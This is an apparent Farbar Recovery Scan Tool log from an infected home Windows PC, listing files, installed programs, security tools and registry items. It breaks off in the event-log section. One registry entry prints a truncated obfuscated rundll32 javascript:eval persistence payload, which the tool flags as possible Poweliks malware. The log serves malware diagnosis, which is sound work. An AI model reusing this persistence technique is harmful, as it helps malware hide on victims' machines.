2014-10-16 06:00 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-16 06:00 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-16 06:00 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-16 06:00 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-16 06:00 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-16 06:00 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-16 06:00 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 06:00 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-16 06:00 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-16 06:00 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-16 06:00 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-16 06:00 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-16 06:00 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-16 06:00 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-16 06:00 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-16 05:59 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-16 05:59 - 2014-08-28 20:44 - 02744320 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-16 05:59 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-16 05:59 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-16 05:59 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-16 05:59 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-16 05:58 - 2014-08-29 20:50 - 05702656 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-08 16:48 - 2014-10-24 19:09 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-09-30 05:40 - 2014-09-30 05:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-24 19:17 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-24 19:17 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-24 19:15 - 2012-08-25 09:04 - 00001844 _____ () C:\Users\Public\Desktop\McAfee Internet Security.lnk
2014-10-24 19:15 - 2010-05-07 22:53 - 01613249 _____ () C:\windows\WindowsUpdate.log
2014-10-24 19:09 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-24 19:09 - 2009-07-13 23:39 - 00333667 _____ () C:\windows\setupact.log
2014-10-24 18:40 - 2010-05-07 23:24 - 00720546 _____ () C:\windows\PFRO.log
2014-10-23 22:17 - 2010-08-14 11:20 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Skype
2014-10-23 20:13 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude\AppData\Local\VirtualStore
2014-10-23 20:02 - 2014-07-05 15:34 - 00000000 ____D () C:\windows\Minidump
2014-10-22 23:19 - 2011-06-06 11:12 - 00000000 ____D () C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
2014-10-22 23:18 - 2013-08-03 08:13 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-10-22 23:18 - 2011-07-30 12:21 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-22 23:17 - 2010-08-29 13:04 - 00000000 ____D () C:\Users\Jude\AppData\Local\Adobe
2014-10-22 23:08 - 2011-07-30 12:19 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-22 23:07 - 2010-08-29 13:05 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-20 20:17 - 2014-07-05 15:34 - 347985863 _____ () C:\windows\MEMORY.DMP
2014-10-20 18:56 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\rescache
2014-10-19 09:35 - 2010-08-29 13:23 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Malwarebytes
2014-10-19 09:34 - 2010-08-29 13:23 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-16 16:07 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\Microsoft.NET
2014-10-16 09:16 - 2009-07-13 23:33 - 00408160 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-16 09:08 - 2013-08-03 08:26 - 00000000 ____D () C:\windows\system32\MRT
2014-10-16 09:01 - 2010-12-25 17:37 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-16 07:59 - 2011-09-01 13:39 - 00000000 ____D () C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
2014-10-06 11:15 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\system32\NDF
2014-10-01 11:11 - 2013-11-30 09:46 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-09-29 07:47 - 2009-07-13 23:53 - 00032632 _____ () C:\windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\ProgramData\flashax10.exe
C:\Users\Jude\gotomypc_540.exe


Some content of TEMP:
====================
C:\Users\Jude\AppData\Local\Temp\catchme.dll
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
C:\Users\Jude\AppData\Local\Temp\MSN407.exe
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
C:\Users\Jude\AppData\Local\Temp\Refresh.exe
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-20 18:48

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x86) Version: 23-10-2014
Ran by Jude at 2014-10-24 19:38:17
Running from C:\Users\Jude\Documents
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
ATI Catalyst Install Manager (HKLM\...\{E5BD6284-4CB5-67B7-0578-F015543030CF}) (Version: 3.0.732.0 - ATI Technologies, Inc.)
Avast Free Antivirus (HKLM\...\Avast) (Version: 10.0.2206 - AVAST Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon MX860 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX860_series) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2009.0710.1127.18698 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2009.0710.1127.18698 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2009.0710.1127.18698 - ATI) Hidden
CCC Help Chinese Standard (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Czech (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Danish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Dutch (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help English (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Finnish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help French (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help German (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Greek (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Hungarian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Italian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Japanese (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Korean (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Norwegian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Polish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Portuguese (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Russian (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Spanish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Swedish (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Thai (Version: 2009.0710.1126.18698 - ATI) Hidden
CCC Help Turkish (Version: 2009.0710.1126.18698 - ATI) Hidden
ccc-core-static (Version: 2009.0710.1127.18698 - ATI) Hidden
ccc-utility (Version: 2009.0710.1127.18698 - ATI) Hidden
Coupon Printer for Windows (HKLM\...\Coupon Printer for Windows5.0.0.1) (Version: 5.0.0.1 - Coupons.com Incorporated)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
DIBS (Version: 1.7.0 - DDNI) Hidden
EPSON Artisan 730 Series Printer Uninstall (HKLM\...\EPSON Artisan 730 Series) (Version:  - SEIKO EPSON Corporation)
Epson Connect (HKLM\...\{64BA551C-9AF6-495C-93F3-D1270E0045FC}) (Version:  - )
Epson Customer Participation (HKLM\...\{814FA673-A085-403C-9545-747FC1495069}) (Version: 1.0.0.0 - SEIKO EPSON CORPORATION)
Epson Download Navigator (HKLM\...\{10F63395-157F-4B93-AB4D-702A2FF11942}) (Version: 1.0.1 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM\...\{8ED43F7E-A8F6-4898-AF11-B6158F2EDF94}) (Version: 2.50.0000 - SEIKO EPSON CORPORATION)
Epson Print CD (HKLM\...\{D16A31F9-276D-4968-A753-FFEAC56995D0}) (Version: 2.05.00 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
FanSpeedControl (HKLM\...\InstallShield_{209E3222-E1E4-4244-A2E5-49DCEBEA1A91}) (Version: 1.00.00.13 - Lenovo)
FanSpeedControl (Version: 1.00.00.13 - Lenovo) Hidden
GoToMyPC (HKLM\...\{99327AF8-A8FE-4948-B47E-47982357F470}) (Version: 8.2.1470 - Citrix Online)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Java Auto Updater (Version: 2.1.71.14 - Oracle, Inc.) Hidden
Juniper Networks Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 2.2.3.8885 - Juniper Networks)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Driver and Application Installation (HKLM\...\{45970CD1-D599-47D4-938F-3E9800D54ED1}) (Version: 5.1.0.1126 - Lenovo)
Lenovo First Boot (HKLM\...\{F2602F16-02D1-4F1C-99A5-E246C522A59D}) (Version: 1.7.3.5 - DDNI)
Lenovo Healthcare Software (HKLM\...\{9610EC3A-C7A0-4C31-9F3B-F9020C582B47}) (Version: 3.0.0.090928 - Lenovo)
Lenovo Idea Central (HKLM\...\Lenovo Idea Central) (Version: 1.7.3.5 - DDNI)
Lenovo Idea Notes (HKLM\...\{A06E1854-1580-4157-AD70-72734D324DEA}) (Version: 1.5.1 - DDNI)
Lenovo Power2Go (HKLM\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3321a3 - CyberLink Corp.)
Lenovo Power2Go (Version: 6.0.3321a3 - CyberLink Corp.) Hidden
Lenovo Rescue System (HKLM\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 3.0.1029 - CyberLink Corp.)
Lenovo Rescue System (Version: 3.0.1029 - CyberLink Corp.) Hidden
Lenovo Software Instruction (HKLM\...\{A79C1D34-2831-4A5D-91C7-279EF892B5CF}) (Version: 1.0.0.090907 - Lenovo)
LTCM Client (HKLM\...\LTCM Client) (Version:  - Leader Technologies Inc.)
LVT (HKLM\...\{D3063097-EC84-4D21-84A4-9D852E974355}) (Version: 4.1.1.0930 - Lenovo)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Internet Security (HKLM\...\MSC) (Version: 12.8.988 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.7 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.1.10329.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0006 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5958 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30095 - Realtek Semiconductor Corp.)
Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.16 (HKLM\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.)
SpyHunter (HKLM\...\{455F074C-814E-4520-B69B-5584BD90400C}) (Version: 4.17.6.4336 - Enigma Software Group USA, LLC)
Windows Driver Package - Citrix Systems monblanking Citrix Driver  (04/25/2013 6.2.101.0) (HKLM\...\831FB1509292986F102B3AB7C8451FA1EA13B0F7) (Version: 04/25/2013 6.2.101.0 - Citrix Systems)
Windows Live Communications Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Essentials (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mail (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live UX Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}\InprocServer32 -> C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll (Microsoft)
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File

==================== Restore Points  =========================

24-10-2014 03:14:31 Installed SpyHunter
25-10-2014 00:11:54 Removed Sophos Virus Removal Tool.
25-10-2014 00:18:24 Removed Sophos Virus Removal Tool.
25-10-2014 00:34:16 Removed SpyHunter

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0A914036-CC1B-405D-9101-BFEA6728354F} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2014-01-09] (Enigma Software Group USA, LLC.)
Task: {256D20A3-E260-45B3-A200-6501BA821A09} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-10-23] (AVAST Software)
Task: {64896B75-59B2-4E3E-B610-37F91B1CBC7A} - System32\Tasks\{F3447E5C-8F81-4D66-814C-FA6E83C68048} => C:\Program Files\Skype\Phone\Skype.exe [2014-05-08] (Skype Technologies S.A.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Loaded Modules (whitelisted) =============

2014-10-24 18:41 - 2014-10-24 18:41 - 02896896 _____ () C:\Program Files\AVAST Software\Avast\defs\14102401\algo.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 02151544 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxVMM.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 00021488 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxREM.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 04470080 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxRT.dll
2010-05-07 23:02 - 2008-09-27 10:39 - 00045056 _____ () C:\Program Files\Lenovo\HealthCare\HOOK.dll
2010-05-07 23:02 - 2009-09-09 11:25 - 00057344 _____ () C:\Program Files\Lenovo\HealthCare\en-us\en-us.dll
2009-06-03 22:59 - 2009-06-03 22:59 - 00619816 ____N () C:\Program Files\Lenovo\Power2Go\CLMediaLibrary.dll
2009-06-03 22:59 - 2009-06-03 22:59 - 00013096 ____N () C:\Program Files\Lenovo\Power2Go\CLMLSvcPS.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 38561576 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2009-06-19 12:33 - 2009-06-19 12:33 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-05-07 22:54 - 2010-05-07 22:54 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2014-10-23 20:28 - 2014-10-23 20:28 - 00317632 _____ () C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxDDU.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\Jude\Documents\Grandpa Frank's picture.eml:OECustomProperty

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-4075801609-534856644-2620926182-500 - Administrator - Disabled)
Guest (S-1-5-21-4075801609-534856644-2620926182-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-4075801609-534856644-2620926182-1006 - Limited - Enabled)
Jude (S-1-5-21-4075801609-534856644-2620926182-1004 - Administrator - Enabled) => C:\Users\Jude

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Canon MX860 ser Network
Description: Canon MX860 ser Network
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: Canon
Service: StillCam
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (10/23/2014 09:06:38 PM) (Source: Application Error) (EventID: 1000) (User: )
